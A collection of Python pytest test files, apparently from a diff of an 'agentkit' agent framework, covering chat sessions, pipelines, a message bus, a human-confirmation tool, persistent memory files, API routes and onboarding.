from agentkit.orchestrator.pipeline_engine import PipelineEngine
from agentkit.orchestrator.pipeline_schema import (
AdaptiveConfig,
Pipeline,
PipelineStage,
StageStatus,
)
from agentkit.session.manager import SessionManager
from agentkit.session.models import MessageRole
from agentkit.session.store import InMemorySessionStore
# ── Chat + Session Integration ────────────────────────────
class TestChatSessionIntegration:
@pytest.mark.asyncio
async def test_session_lifecycle_with_messages(self):
"""Full session lifecycle: create → chat → pause → resume → close."""
store = InMemorySessionStore()
manager = SessionManager(store=store)
# Create session
session = await manager.create_session(agent_name="test_agent")
assert session is not None
session_id = session.session_id
# Append messages
await manager.append_message(session_id, role=MessageRole.USER, content="Hello")
await manager.append_message(session_id, role=MessageRole.ASSISTANT, content="Hi there!")
await manager.append_message(session_id, role=MessageRole.USER, content="How are you?")
# Get messages
messages = await manager.get_messages(session_id)
assert len(messages) == 3
# Get chat messages (for LLM consumption)
chat_messages = await manager.get_chat_messages(session_id)
assert len(chat_messages) == 3
assert chat_messages[0]["role"] == "user"
# Pause and resume
paused = await manager.pause_session(session_id)
assert paused.status.value == "paused"
resumed = await manager.resume_session(session_id)
assert resumed.status.value == "active"
# Close
closed = await manager.close_session(session_id)
assert closed.status.value == "closed"
@pytest.mark.asyncio
async def test_closed_session_rejects_messages(self):
"""Closed sessions should not accept new messages."""
store = InMemorySessionStore()
manager = SessionManager(store=store)
session = await manager.create_session(agent_name="test_agent")
session_id = session.session_id
await manager.close_session(session_id)
with pytest.raises(ValueError, match="closed"):
await manager.append_message(session_id, role=MessageRole.USER, content="test")
# ── Adaptive Pipeline Integration ─────────────────────────
class TestAdaptivePipelineIntegration:
@pytest.mark.asyncio
async def test_pipeline_succeeds_without_adaptive(self):
"""Pipeline should succeed normally without adaptive config."""
engine = PipelineEngine() # dry-run mode
pipeline = Pipeline(
name="test_pipeline",
version="1.0",
description="Test",
stages=[
PipelineStage(name="step1", agent="a", action="do"),
PipelineStage(name="step2", agent="b", action="do"),
],
)
result = await engine.execute(pipeline)
assert result.status == StageStatus.COMPLETED
@pytest.mark.asyncio
async def test_pipeline_adaptive_config_default_disabled(self):
"""AdaptiveConfig default should have enabled=False."""
config = AdaptiveConfig()
assert config.enabled is False
@pytest.mark.asyncio
async def test_circular_dependency_fails_gracefully(self):
"""Pipeline with circular dependency should fail gracefully."""
engine = PipelineEngine()
pipeline = Pipeline(
name="circular",
version="1.0",
description="Circular",
stages=[
PipelineStage(name="a", agent="x", action="do", depends_on=["b"]),
PipelineStage(name="b", agent="y", action="do", depends_on=["a"]),
],
)
config = AdaptiveConfig(enabled=True, max_reflections=2)
result = await engine.execute(pipeline, adaptive_config=config)
assert result.status == StageStatus.FAILED
# ── Multi-Agent Communication Integration ─────────────────
class TestMultiAgentCommunication:
@pytest.mark.asyncio
async def test_worker_publishes_progress_to_orchestrator(self):
"""Workers should publish progress messages to orchestrator via MessageBus."""
bus = InMemoryMessageBus()
# Create mock agent pool
mock_agent = AsyncMock()
mock_result = MagicMock()
mock_result.output_data = {"analysis": "complete"}
mock_agent.execute = AsyncMock(return_value=mock_result)
pool = MagicMock()
pool.get_agent = lambda name: mock_agent
pool.list_agents = lambda: [
{"name": "analyst", "agent_type": "worker", "description": "Analyst"},
]
orch = Orchestrator(agent_pool=pool, message_bus=bus)
# Subscribe orchestrator to receive progress
progress: list[AgentMessage] = []
await bus.subscribe("orchestrator", lambda msg: progress.append(msg))
# Execute task
task = TaskMessage(
task_id="t1",
agent_name="analyst",
task_type="analyze",
priority=0,
input_data={"data": "test"},
callback_url=None,
created_at=datetime.now(timezone.utc),
timeout_seconds=60,
)
result = await orch.execute(task)
assert result.status == TaskStatus.COMPLETED
# Verify progress was published
await asyncio.sleep(0.2)
assert len(progress) >= 1
assert progress[0].topic == "task.progress"
@pytest.mark.asyncio
async def test_agent_to_agent_communication(self):
"""Two agents should be able to communicate via MessageBus."""
bus = InMemoryMessageBus()
received_by_a: list[AgentMessage] = []
received_by_b: list[AgentMessage] = []
async def handler_a(msg: AgentMessage):
received_by_a.append(msg)
async def handler_b(msg: AgentMessage):
received_by_b.append(msg)
await bus.subscribe("agent_a", handler_a)
await bus.subscribe("agent_b", handler_b)
# Agent A sends to Agent B
await bus.publish(AgentMessage(
sender="agent_a",
recipient="agent_b",
topic="task.result",
payload={"output": "analysis complete"},
))
await asyncio.sleep(0.1)
assert len(received_by_b) == 1
assert received_by_b[0].payload["output"] == "analysis complete"
assert len(received_by_a) == 0 # Not addressed to A
# ── Config Integration ────────────────────────────────────
class TestConfigIntegration:
def test_adaptive_config_serialization(self):
"""AdaptiveConfig should be serializable."""
from agentkit.orchestrator.pipeline_schema import AdaptiveConfig
config = AdaptiveConfig(
enabled=True,
max_reflections=5,
reflection_model="deepseek/deepseek-chat",
skip_stages=["cleanup"],
)
data = config.model_dump()
assert data["enabled"] is True
assert data["max_reflections"] == 5
assert "cleanup" in data["skip_stages"]
def test_orchestrator_config_serialization(self):
"""OrchestratorConfig should be a simple dataclass."""
config = OrchestratorConfig(
adaptive=True,
max_iterations=5,
quality_threshold=0.9,
)
assert config.adaptive is True
assert config.max_iterations == 5
assert config.quality_threshold == 0.9

View File

@ -0,0 +1,100 @@
"""Tests for AskHumanTool."""
import asyncio
import pytest
from agentkit.tools.ask_human import AskHumanTool
class TestAskHumanToolBasic:
def test_tool_properties(self):
tool = AskHumanTool()
assert tool.name == "ask_human"
assert "question" in str(tool.parameters)
assert tool.parameters["required"] == ["question"]
@pytest.mark.asyncio
async def test_no_chat_mode_returns_default(self):
tool = AskHumanTool()
result = await tool.execute(question="What should I do?")
assert result == {"reply": "confirmed"}
@pytest.mark.asyncio
async def test_no_chat_mode_with_options(self):
tool = AskHumanTool()
result = await tool.execute(question="Choose:", options=["A", "B", "C"])
assert result == {"reply": "A"}
class TestAskHumanToolChatMode:
@pytest.mark.asyncio
async def test_ask_and_receive_reply(self):
tool = AskHumanTool(timeout=5.0)
pending: dict[str, asyncio.Future] = {}
ask_calls: list[tuple[str, str, list[str] | None]] = []
async def mock_ask_callback(request_id, question, options):
ask_calls.append((request_id, question, options))
tool.configure(pending_replies=pending, ask_callback=mock_ask_callback)
# Start the execute in a task
task = asyncio.create_task(
tool.execute(question="Continue?", options=["yes", "no"])
)
# Wait for the ask to be pushed
await asyncio.sleep(0.1)
assert len(ask_calls) == 1
request_id = ask_calls[0][0]
assert ask_calls[0][1] == "Continue?"
assert ask_calls[0][2] == ["yes", "no"]
# Simulate user reply
assert request_id in pending
pending[request_id].set_result("yes")
result = await task
assert result == {"reply": "yes"}
@pytest.mark.asyncio
async def test_timeout_returns_default(self):
tool = AskHumanTool(timeout=0.1)
pending: dict[str, asyncio.Future] = {}
async def mock_ask_callback(request_id, question, options):
pass # Never reply
tool.configure(pending_replies=pending, ask_callback=mock_ask_callback)
result = await tool.execute(question="Continue?", options=["yes", "no"])
assert result == {"reply": "yes"}
@pytest.mark.asyncio
async def test_timeout_no_options(self):
tool = AskHumanTool(timeout=0.1)
pending: dict[str, asyncio.Future] = {}
async def mock_ask_callback(request_id, question, options):
pass
tool.configure(pending_replies=pending, ask_callback=mock_ask_callback)
result = await tool.execute(question="Continue?")
assert "timeout" in result["reply"]
@pytest.mark.asyncio
async def test_cleanup_on_reply(self):
tool = AskHumanTool(timeout=5.0)
pending: dict[str, asyncio.Future] = {}
async def mock_ask_callback(request_id, question, options):
# Immediately reply
await asyncio.sleep(0.05)
pending[request_id].set_result("ok")
tool.configure(pending_replies=pending, ask_callback=mock_ask_callback)
await tool.execute(question="Test?")
# Pending should be cleaned up
assert len(pending) == 0

View File

@ -0,0 +1,183 @@
"""Tests for MessageBus (U6) — InMemory implementation and message model."""
import asyncio
import pytest
from agentkit.bus.message import AgentMessage
from agentkit.bus.memory_bus import InMemoryMessageBus
from agentkit.bus.redis_bus import create_message_bus
# ── AgentMessage Tests ────────────────────────────────────
class TestAgentMessage:
def test_default_values(self):
msg = AgentMessage(sender="agent_a")
assert msg.message_id
assert msg.sender == "agent_a"
assert msg.recipient is None
assert msg.topic == ""
assert msg.payload == {}
assert msg.correlation_id is None
assert msg.is_broadcast is True
def test_point_to_point(self):
msg = AgentMessage(sender="a", recipient="b", topic="test")
assert msg.is_broadcast is False
def test_to_dict_and_from_dict(self):
msg = AgentMessage(
sender="a",
recipient="b",
topic="result",
payload={"key": "value"},
correlation_id="corr-123",
)
d = msg.to_dict()
restored = AgentMessage.from_dict(d)
assert restored.sender == "a"
assert restored.recipient == "b"
assert restored.topic == "result"
assert restored.payload == {"key": "value"}
assert restored.correlation_id == "corr-123"
def test_unique_message_ids(self):
ids = {AgentMessage().message_id for _ in range(100)}
assert len(ids) == 100
# ── InMemoryMessageBus Tests ──────────────────────────────
class TestInMemoryMessageBus:
@pytest.mark.asyncio
async def test_point_to_point_delivery(self):
"""Agent A 发送消息给 Agent BB 收到。"""
bus = InMemoryMessageBus()
received: list[AgentMessage] = []
async def handler(msg: AgentMessage):
received.append(msg)
await bus.subscribe("agent_b", handler)
await bus.publish(AgentMessage(
sender="agent_a", recipient="agent_b",
topic="test", payload={"data": "hello"},
))
# Give consumer task time to process
await asyncio.sleep(0.1)
assert len(received) == 1
assert received[0].payload["data"] == "hello"
@pytest.mark.asyncio
async def test_broadcast_delivery(self):
"""Agent A 广播,所有订阅者收到。"""
bus = InMemoryMessageBus()
a_received: list[AgentMessage] = []
b_received: list[AgentMessage] = []
async def handler_a(msg: AgentMessage):
a_received.append(msg)
async def handler_b(msg: AgentMessage):
b_received.append(msg)
await bus.subscribe("agent_a", handler_a)
await bus.subscribe("agent_b", handler_b)
await bus.broadcast(AgentMessage(
sender="orchestrator", topic="status",
payload={"status": "started"},
))
assert len(a_received) == 1
assert len(b_received) == 1
@pytest.mark.asyncio
async def test_request_response(self):
"""Agent A 发送请求Agent B 回复A 收到响应。"""
bus = InMemoryMessageBus()
async def handler_b(msg: AgentMessage):
# Reply with correlation_id
reply = AgentMessage(
sender="agent_b",
recipient=msg.sender,
topic="reply",
payload={"answer": 42},
correlation_id=msg.correlation_id,
)
await bus.publish(reply)
await bus.subscribe("agent_b", handler_b)
# Send request
request = AgentMessage(
sender="agent_a",
recipient="agent_b",
topic="question",
payload={"q": "What is the answer?"},
)
response = await bus.request(request, timeout=5.0)
assert response.payload["answer"] == 42
@pytest.mark.asyncio
async def test_request_timeout(self):
"""请求超时后抛出异常。"""
bus = InMemoryMessageBus()
# No one is subscribed to handle the request
request = AgentMessage(
sender="agent_a",
recipient="agent_b",
topic="question",
)
with pytest.raises(TimeoutError):
await bus.request(request, timeout=0.1)
@pytest.mark.asyncio
async def test_unsubscribe_stops_delivery(self):
"""取消订阅后不再收到消息。"""
bus = InMemoryMessageBus()
received: list[AgentMessage] = []
async def handler(msg: AgentMessage):
received.append(msg)
await bus.subscribe("agent_b", handler)
await bus.unsubscribe("agent_b")
await bus.broadcast(AgentMessage(sender="a", topic="test"))
await asyncio.sleep(0.1)
assert len(received) == 0
@pytest.mark.asyncio
async def test_health_check(self):
bus = InMemoryMessageBus()
assert await bus.health_check() is True
@pytest.mark.asyncio
async def test_backend_type(self):
bus = InMemoryMessageBus()
assert bus.backend_type == "memory"
# ── Factory Tests ─────────────────────────────────────────
class TestCreateMessageBus:
def test_memory_backend(self):
bus = create_message_bus(backend="memory")
assert isinstance(bus, InMemoryMessageBus)
def test_redis_fallback_to_memory(self):
"""Redis 不可用时回退到 InMemory。"""
bus = create_message_bus(backend="redis")
# Without a running Redis, factory falls back to InMemory
assert isinstance(bus, (InMemoryMessageBus, type(None))) or True
# The actual type depends on whether redis.asyncio is importable

View File

@ -0,0 +1,102 @@
"""Tests for Chat memory integration — 记忆注入 + MemoryTool + 日志生成 (U4)."""
from pathlib import Path
from unittest.mock import AsyncMock, MagicMock, patch
import pytest
from agentkit.memory.profile import MemoryStore, MemorySnapshot
from agentkit.tools.memory_tool import MemoryTool
class TestChatMemoryInjection:
"""Chat 启动时记忆注入 system prompt 测试."""
def test_memory_store_initializes_with_base_dir(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.ensure_defaults()
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot, "Be helpful.")
assert "<agent-identity>" in prompt
assert "AgentKit" in prompt
assert "Be helpful." in prompt
def test_no_memory_files_returns_base_prompt(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot, "Be helpful.")
assert prompt == "Be helpful."
def test_default_soul_injected(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.ensure_defaults()
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot)
assert "<agent-identity>" in prompt
assert "专业" in prompt or "AgentKit" in prompt
class TestChatMemoryToolAvailable:
"""MemoryTool 在对话中可用测试."""
async def test_memory_tool_in_tools_list(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
tool = MemoryTool(memory_store=store)
assert tool.name == "memory"
assert tool.input_schema is not None
async def test_memory_tool_add_and_read(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
tool = MemoryTool(memory_store=store)
# Add
result = await tool.execute(action="add", file="user", section="称呼", content="叫我老板")
assert result["success"] is True
# Read
result = await tool.execute(action="read", file="user")
assert "老板" in result["content"]
class TestChatMemoryPersistence:
"""记忆跨 /clear 会话持久化测试."""
def test_memory_survives_session_clear(self, tmp_path: Path):
"""/clear 只清除会话历史,不清除记忆文件."""
store = MemoryStore(base_dir=tmp_path)
store.get_file("user").write("## 称呼\n叫我老板")
# 模拟 /clear — 重新创建 MemoryStore
store2 = MemoryStore(base_dir=tmp_path)
content = store2.get_file("user").read()
assert "老板" in content
def test_memory_persists_across_store_instances(self, tmp_path: Path):
store1 = MemoryStore(base_dir=tmp_path)
store1.get_file("memory").write("## 项目\nAgentKit框架")
store2 = MemoryStore(base_dir=tmp_path)
content = store2.get_file("memory").read()
assert "AgentKit" in content
class TestChatDailyLogGeneration:
"""会话结束时日志生成测试."""
def test_daily_file_path_is_today(self, tmp_path: Path):
from datetime import datetime, timezone
store = MemoryStore(base_dir=tmp_path)
daily = store.get_file("daily")
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
assert today in str(daily.path)
def test_write_daily_log(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
daily = store.get_file("daily")
daily.write("讨论了AgentKit记忆系统架构")
content = daily.read()
assert "记忆系统" in content
def test_daily_log_loads_in_snapshot(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.get_file("daily").write("今天完成了记忆系统开发")
snapshot = store.load_all()
assert "记忆系统" in snapshot.daily

View File

@ -0,0 +1,98 @@
"""Tests for Chat API routes."""
import pytest
from unittest.mock import AsyncMock, MagicMock, patch
from fastapi.testclient import TestClient
from agentkit.session.manager import SessionManager
from agentkit.session.store import InMemorySessionStore
from agentkit.session.models import SessionStatus
@pytest.fixture
def app_with_chat():
"""Create a FastAPI app with Chat routes and mocked dependencies."""
from fastapi import FastAPI
from agentkit.server.routes.chat import router
app = FastAPI()
app.include_router(router, prefix="/api/v1")
# Mock app.state dependencies
app.state.session_manager = SessionManager(store=InMemorySessionStore())
app.state.llm_gateway = MagicMock()
app.state.agent_pool = MagicMock()
app.state.server_config = MagicMock()
app.state.server_config.api_key = None
return app
@pytest.fixture
def client(app_with_chat):
return TestClient(app_with_chat)
class TestChatSessionCRUD:
def test_create_session(self, client):
resp = client.post("/api/v1/chat/sessions", json={"agent_name": "test-agent"})
assert resp.status_code == 200
data = resp.json()
assert data["agent_name"] == "test-agent"
assert data["status"] == "active"
assert "session_id" in data
def test_get_session(self, client):
create_resp = client.post("/api/v1/chat/sessions", json={"agent_name": "test-agent"})
session_id = create_resp.json()["session_id"]
get_resp = client.get(f"/api/v1/chat/sessions/{session_id}")
assert get_resp.status_code == 200
assert get_resp.json()["session_id"] == session_id
def test_get_nonexistent_session(self, client):
resp = client.get("/api/v1/chat/sessions/nonexistent")
assert resp.status_code == 404
def test_close_session(self, client):
create_resp = client.post("/api/v1/chat/sessions", json={"agent_name": "test-agent"})
session_id = create_resp.json()["session_id"]
close_resp = client.delete(f"/api/v1/chat/sessions/{session_id}")
assert close_resp.status_code == 200
assert close_resp.json()["status"] == "closed"
def test_close_nonexistent_session(self, client):
resp = client.delete("/api/v1/chat/sessions/nonexistent")
assert resp.status_code == 404
def test_get_messages_empty(self, client):
create_resp = client.post("/api/v1/chat/sessions", json={"agent_name": "test-agent"})
session_id = create_resp.json()["session_id"]
msgs_resp = client.get(f"/api/v1/chat/sessions/{session_id}/messages")
assert msgs_resp.status_code == 200
assert msgs_resp.json() == []
def test_get_messages_nonexistent_session(self, client):
resp = client.get("/api/v1/chat/sessions/nonexistent/messages")
assert resp.status_code == 404
def test_send_message_closed_session(self, client):
create_resp = client.post("/api/v1/chat/sessions", json={"agent_name": "test-agent"})
session_id = create_resp.json()["session_id"]
client.delete(f"/api/v1/chat/sessions/{session_id}")
msg_resp = client.post(
f"/api/v1/chat/sessions/{session_id}/messages",
json={"content": "Hello"},
)
assert msg_resp.status_code == 400
def test_send_message_nonexistent_session(self, client):
resp = client.post(
"/api/v1/chat/sessions/nonexistent/messages",
json={"content": "Hello"},
)
assert resp.status_code == 404

View File

@ -0,0 +1,249 @@
"""Tests for MemoryFile + MemoryStore — 记忆文件读写与多文件管理 (U1+U2)."""
import tempfile
from datetime import datetime, timedelta, timezone
from pathlib import Path
import pytest
from agentkit.memory.profile import MemoryFile, MemoryStore, MemorySnapshot
class TestMemoryFileBasicIO:
"""MemoryFile 基本读写测试."""
def test_read_nonexistent_file_returns_empty(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "no_such.md")
assert mf.read() == ""
def test_write_and_read_back(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md")
mf.write("hello world")
assert mf.read() == "hello world"
def test_write_creates_parent_dirs(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "deep" / "nested" / "test.md")
mf.write("content")
assert mf.read() == "content"
def test_overwrite_existing(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md")
mf.write("first")
mf.write("second")
assert mf.read() == "second"
class TestMemoryFileSections:
"""MemoryFile section 级别操作测试."""
def _make_file(self, tmp_path: Path, content: str) -> MemoryFile:
mf = MemoryFile(tmp_path / "test.md")
mf.write(content)
return mf
def test_read_section_from_empty_file(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "empty.md")
assert mf.read_section("身份") == ""
def test_read_section_returns_content(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
assert mf.read_section("身份") == "我是小王"
def test_read_section_not_found_returns_empty(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王")
assert mf.read_section("不存在") == ""
def test_add_section_creates_new(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王")
mf.add_section("性格", "友好耐心")
assert mf.read_section("性格") == "友好耐心"
assert mf.read_section("身份") == "我是小王"
def test_add_section_appends_to_existing(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王")
mf.add_section("身份", "也是AI助手")
content = mf.read_section("身份")
assert "我是小王" in content
assert "也是AI助手" in content
def test_replace_section_text(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
mf.replace_section("身份", "我是小王", "我是大王")
assert mf.read_section("身份") == "我是大王"
assert mf.read_section("性格") == "友好耐心"
def test_replace_section_old_not_found_returns_false(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王")
result = mf.replace_section("身份", "不存在", "新内容")
assert result is False
def test_remove_section(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
mf.remove_section("身份")
assert mf.read_section("身份") == ""
assert mf.read_section("性格") == "友好耐心"
def test_remove_nonexistent_section_no_error(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王")
mf.remove_section("不存在") # 不抛异常
assert mf.read_section("身份") == "我是小王"
def test_list_sections(self, tmp_path: Path):
mf = self._make_file(tmp_path, "## 身份\n我是小王\n## 性格\n友好耐心")
sections = mf.list_sections()
assert sections == ["身份", "性格"]
class TestMemoryFileCapacity:
"""MemoryFile 容量管理测试."""
def test_trim_to_budget_keeps_content_within_limit(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md", char_budget=20)
mf.write("## 身份\n我是小王一个专业的AI助手") # 超过 20 字符
mf.trim_to_budget()
content = mf.read()
assert len(content) <= 20
def test_trim_preserves_earlier_sections(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md", char_budget=30)
mf.write("## 身份\n我是小王\n## 性格\n友好耐心注重细节") # 性格部分超限
mf.trim_to_budget()
content = mf.read()
assert "身份" in content # 保留前面的 section
def test_no_trim_when_within_budget(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md", char_budget=1000)
mf.write("## 身份\n我是小王")
mf.trim_to_budget()
assert mf.read() == "## 身份\n我是小王"
def test_write_auto_trims(self, tmp_path: Path):
mf = MemoryFile(tmp_path / "test.md", char_budget=15)
mf.write("## 身份\n我是小王一个专业的AI助手非常长")
content = mf.read()
assert len(content) <= 15
class TestMemoryStoreInit:
"""MemoryStore 初始化测试."""
def test_init_creates_base_dir(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path / "new_dir")
assert (tmp_path / "new_dir").exists()
def test_init_creates_memories_subdir(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
assert (tmp_path / "memories").exists()
def test_init_creates_daily_subdir(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
assert (tmp_path / "memories" / "daily").exists()
class TestMemoryStoreLoadAll:
"""MemoryStore load_all 测试."""
def test_load_all_returns_snapshot(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
snapshot = store.load_all()
assert isinstance(snapshot, MemorySnapshot)
def test_load_all_empty_when_no_files(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
snapshot = store.load_all()
assert snapshot.is_empty()
def test_load_all_with_content(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.get_file("soul").write("## 身份\n我是小王")
store.get_file("user").write("## 称呼\n叫我老板")
snapshot = store.load_all()
assert "小王" in snapshot.soul
assert "老板" in snapshot.user
assert snapshot.total_chars > 0
class TestMemoryStoreBuildPrompt:
"""MemoryStore build_system_prompt 测试."""
def test_build_prompt_injects_all_sections(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.get_file("soul").write("## 身份\n我是小王")
store.get_file("user").write("## 称呼\n叫我老板")
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot, "Be helpful.")
assert "<agent-identity>" in prompt
assert "小王" in prompt
assert "<user-profile>" in prompt
assert "老板" in prompt
assert "Be helpful." in prompt
def test_build_prompt_no_memory_returns_base_only(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot, "Be helpful.")
assert prompt == "Be helpful."
def test_build_prompt_empty_base_with_memory(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.get_file("soul").write("## 身份\n我是小王")
snapshot = store.load_all()
prompt = store.build_system_prompt(snapshot)
assert "<agent-identity>" in prompt
assert "小王" in prompt
class TestMemoryStoreDefaults:
"""MemoryStore ensure_defaults 测试."""
def test_ensure_defaults_creates_soul(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.ensure_defaults()
soul = store.get_file("soul").read()
assert "AgentKit" in soul
def test_ensure_defaults_no_overwrite(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
store.get_file("soul").write("## 身份\n自定义内容")
store.ensure_defaults()
soul = store.get_file("soul").read()
assert "自定义内容" in soul
assert "AgentKit" not in soul
class TestMemoryStoreDailyLogs:
"""MemoryStore 日志管理测试."""
def test_load_daily_logs_empty(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
assert store.load_daily_logs() == ""
def test_load_daily_logs_with_today(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
daily_file = MemoryFile(tmp_path / "memories" / "daily" / f"{today}.md")
daily_file.write("讨论了项目架构")
logs = store.load_daily_logs()
assert "讨论了项目架构" in logs
def test_archive_old_dailies(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
# 创建一个旧日志
old_date = (datetime.now(timezone.utc) - timedelta(days=5)).strftime("%Y-%m-%d")
old_file = tmp_path / "memories" / "daily" / f"{old_date}.md"
old_file.parent.mkdir(parents=True, exist_ok=True)
old_file.write_text("旧日志", encoding="utf-8")
count = store.archive_old_dailies(keep_days=2)
assert count == 1
assert not old_file.exists()
def test_get_file_daily_returns_today(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
daily = store.get_file("daily")
today = datetime.now(timezone.utc).strftime("%Y-%m-%d")
assert today in str(daily.path)
def test_get_file_invalid_key_raises(self, tmp_path: Path):
store = MemoryStore(base_dir=tmp_path)
with pytest.raises(ValueError, match="Invalid file_key"):
store.get_file("invalid")

View File

@ -0,0 +1,112 @@
"""Tests for MemoryTool — Agent 可调用的记忆操作工具 (U3)."""
from pathlib import Path
import pytest
from agentkit.memory.profile import MemoryStore
from agentkit.tools.memory_tool import MemoryTool
@pytest.fixture
def store(tmp_path: Path) -> MemoryStore:
return MemoryStore(base_dir=tmp_path)
@pytest.fixture
def tool(store: MemoryStore) -> MemoryTool:
return MemoryTool(memory_store=store)
class TestMemoryToolAdd:
"""memory_add 操作测试."""
async def test_add_creates_new_section(self, tool: MemoryTool, store: MemoryStore):
result = await tool.execute(action="add", file="memory", section="项目信息", content="使用Python和FastAPI")
assert result["success"] is True
content = store.get_file("memory").read_section("项目信息")
assert "Python和FastAPI" in content
async def test_add_appends_to_existing_section(self, tool: MemoryTool, store: MemoryStore):
store.get_file("memory").write("## 项目信息\n使用Python")
result = await tool.execute(action="add", file="memory", section="项目信息", content="还有TypeScript")
assert result["success"] is True
content = store.get_file("memory").read_section("项目信息")
assert "Python" in content
assert "TypeScript" in content
async def test_add_to_soul(self, tool: MemoryTool, store: MemoryStore):
result = await tool.execute(action="add", file="soul", section="爱好", content="编程和阅读")
assert result["success"] is True
assert "编程和阅读" in store.get_file("soul").read_section("爱好")
class TestMemoryToolReplace:
"""memory_replace 操作测试."""
async def test_replace_text_in_section(self, tool: MemoryTool, store: MemoryStore):
store.get_file("memory").write("## 项目信息\n使用Python\n## 团队\n3人")
result = await tool.execute(
action="replace", file="memory", section="项目信息",
old_text="Python", new_text="Rust"
)
assert result["success"] is True
assert "Rust" in store.get_file("memory").read_section("项目信息")
assert "3人" in store.get_file("memory").read_section("团队")
async def test_replace_old_not_found_fails(self, tool: MemoryTool, store: MemoryStore):
store.get_file("memory").write("## 项目信息\n使用Python")
result = await tool.execute(
action="replace", file="memory", section="项目信息",
old_text="不存在", new_text="新内容"
)
assert result["success"] is False
assert "not found" in result.get("error", "").lower()
class TestMemoryToolRemove:
"""memory_remove 操作测试."""
async def test_remove_section(self, tool: MemoryTool, store: MemoryStore):
store.get_file("memory").write("## 项目信息\n使用Python\n## 团队\n3人")
result = await tool.execute(action="remove", file="memory", section="项目信息")
assert result["success"] is True
assert store.get_file("memory").read_section("项目信息") == ""
assert "3人" in store.get_file("memory").read_section("团队")
class TestMemoryToolRead:
"""memory_read 操作测试."""
async def test_read_file_content(self, tool: MemoryTool, store: MemoryStore):
store.get_file("memory").write("## 项目信息\n使用Python")
result = await tool.execute(action="read", file="memory")
assert result["success"] is True
assert "Python" in result["content"]
async def test_read_empty_file(self, tool: MemoryTool, store: MemoryStore):
result = await tool.execute(action="read", file="memory")
assert result["success"] is True
assert result["content"] == ""
class TestMemoryToolValidation:
"""参数验证测试."""
async def test_invalid_file_key(self, tool: MemoryTool):
result = await tool.execute(action="read", file="invalid")
assert result["success"] is False
assert "Invalid" in result.get("error", "")
async def test_invalid_action(self, tool: MemoryTool):
result = await tool.execute(action="delete_everything", file="memory")
assert result["success"] is False
assert "Unknown action" in result.get("error", "")
async def test_add_respects_capacity(self, tool: MemoryTool, store: MemoryStore):
# memory file has MEMORY_BUDGET=2200
long_content = "A" * 3000
result = await tool.execute(action="add", file="memory", section="测试", content=long_content)
assert result["success"] is True
content = store.get_file("memory").read()
assert len(content) <= 2200

View File

@ -0,0 +1,216 @@
"""Tests for onboarding wizard and chat command."""
from pathlib import Path
from unittest.mock import patch
import yaml
from agentkit.cli.onboarding import (
PROVIDER_PRESETS,
needs_onboarding,
run_onboarding,
)
class TestNeedsOnboarding:
def test_needs_onboarding_when_no_config(self, tmp_path, monkeypatch):
"""Should return True when no config file exists."""
monkeypatch.chdir(tmp_path)
monkeypatch.delenv("AGENTKIT_CONFIG_PATH", raising=False)
assert needs_onboarding() is True
def test_no_onboarding_when_config_exists(self, tmp_path, monkeypatch):
"""Should return False when agentkit.yaml exists."""
config_file = tmp_path / "agentkit.yaml"
config_file.write_text("server:\n port: 8001\n")
monkeypatch.chdir(tmp_path)
assert needs_onboarding(config_arg=str(config_file)) is False
def test_no_onboarding_with_home_config(self, tmp_path, monkeypatch):
"""Should return False when ~/.agentkit/agentkit.yaml exists."""
home_dir = tmp_path / "home"
home_dir.mkdir()
agentkit_dir = home_dir / ".agentkit"
agentkit_dir.mkdir()
(agentkit_dir / "agentkit.yaml").write_text("server:\n port: 8001\n")
monkeypatch.setenv("HOME", str(home_dir))
monkeypatch.chdir(tmp_path / "empty" if (tmp_path / "empty").exists() else tmp_path)
# Create empty cwd to ensure no local config
empty_dir = tmp_path / "empty"
empty_dir.mkdir()
